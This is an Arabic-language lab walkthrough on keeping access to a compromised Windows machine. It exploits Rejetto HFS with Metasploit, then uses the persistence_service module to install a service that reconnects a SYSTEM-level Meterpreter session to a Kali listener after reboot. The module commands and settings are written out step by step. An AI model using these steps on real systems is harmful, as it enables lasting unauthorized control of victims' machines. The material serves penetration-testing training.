🧪 1. الحفاظ على وصول Windows عبر خدمة (Maintaining Access – Persistence Service Lab)

🎯 الهدف الأساسي: إنشاء خدمة دائمة على نظام Windows مستهدف لضمان بقاء الوصول، وذلك بإنشاء خدمة جديدة تقوم بتشغيل Meterpreter payload يتصل بمستمع على Kali Linux.

🔧 الأدوات المستخدمة:

  • Nmap

  • Metasploit Framework (MSFConsole)

  • exploit/windows/http/rejetto_hfs_exec (Metasploit module)

  • Meterpreter commands: getuid, background, sessions

  • exploit/windows/local/persistence_service (Metasploit Post-Exploitation module)

  • exploit/multi/handler (Metasploit module)

  • Windows Command: reboot (للمحاكاة)

📜 خطوات التنفيذ:

📊 أولاً: الاستطلاع والفحص والاستغلال والحصول على صلاحيات Administrator (Reconnaissance, Scanning, Exploitation & Privilege Escalation) 🗣️ إذا كررت عملية الاستطلاع والفحص والاستغلال (Nmap، Metasploit، rejetto_hfs_exec) كما في اللابات السابقة.

  • فسوف تحصل على جلسة Meterpreter على النظام المستهدف.

  • للتحقق من صلاحياتك (يجب أن تكون Administrator أو SYSTEM):

    getuid

    فسوف يعرض لك أنك داخل بصلاحيات Administrator. (ملاحظة: يتطلب هذا الموديول صلاحيات Administrator أو SYSTEM).

📊 ثانياً: إعداد Persistence عبر خدمة (Post-Exploitation - Persistence)

  • لو وضعت جلسة Meterpreter في الخلفية:

    background

    فسوف تخرج إلى موجه Metasploit الرئيسي.

  • لو استخدمت موديول exploit/windows/local/persistence_service لإنشاء خدمة دائمة:

    use exploit/windows/local/persistence_service
    set LPORT 4433 # استخدام منفذ مختلف عن المنفذ الأصلي للجلسة
    set SESSION 1 # افترض أن رقم الجلسة 1
    exploit

    فسوف يقوم الموديول بإنشاء ورفع ملف تنفيذي (executable) إلى النظام المستهدف، ثم يقوم بإنشاء خدمة جديدة على Windows لتشغيل هذا الملف. سوف تحصل على جلسة Meterpreter جديدة (غالباً بصلاحيات SYSTEM).

    • للتحقق من الجلسات المفتوحة:

      sessions

      فسوف ترى جلستين: الجلسة الأصلية (Administrator) والجلسة الجديدة (SYSTEM).

📊 ثالثاً: إعداد مستمع دائم على Kali Linux (Post-Exploitation - Persistence)

  • لو فتحت msfconsole جديدة في New Tab.

  • لو استخدمت موديول exploit/multi/handler وإعداده:

    فسوف ينتظر المستمع اتصالات من الخدمة الدائمة.

📊 رابعاً: التحقق من Persistence (Post-Exploitation - Persistence)

  • لمحاكاة إعادة تشغيل النظام المستهدف (من الجلسة Meterpreter الأصلية):

    فسوف يعيد النظام المستهدف التشغيل.

  • على Kali Linux (في Terminal المستمع):

    • بعد إعادة تشغيل النظام المستهدف، فسوف تستقبل جلسة Meterpreter جديدة.

    • للتحقق من الصلاحيات في الجلسة الجديدة:

      فسوف يعرض لك NT AUTHORITY\SYSTEM.

  • 💡حتى لو تم إغلاق الجلسة الجديدة أو الأصلية، فسوف يستمر المستمع في تلقي جلسات جديدة طالما أن الخدمة الدائمة تعمل على النظام المستهدف.

  • تنظيف الآثار: موديول persistence_service يولد ملف cleanup.rc، يمكن تشغيله لإزالة الخدمة والملفات التي تم إنشاؤها.

نقاط التحقق:

  • الحصول على جلسة Meterpreter بصلاحيات Administrator.

  • 🔑 نجاح إنشاء خدمة Persistence باستخدام exploit/windows/local/persistence_service.

  • 🔑 إعداد multi/handler على Kali للاستماع.

  • 🔑 تلقي جلسة Meterpreter جديدة بصلاحيات SYSTEM بعد إعادة تشغيل النظام المستهدف.

Last updated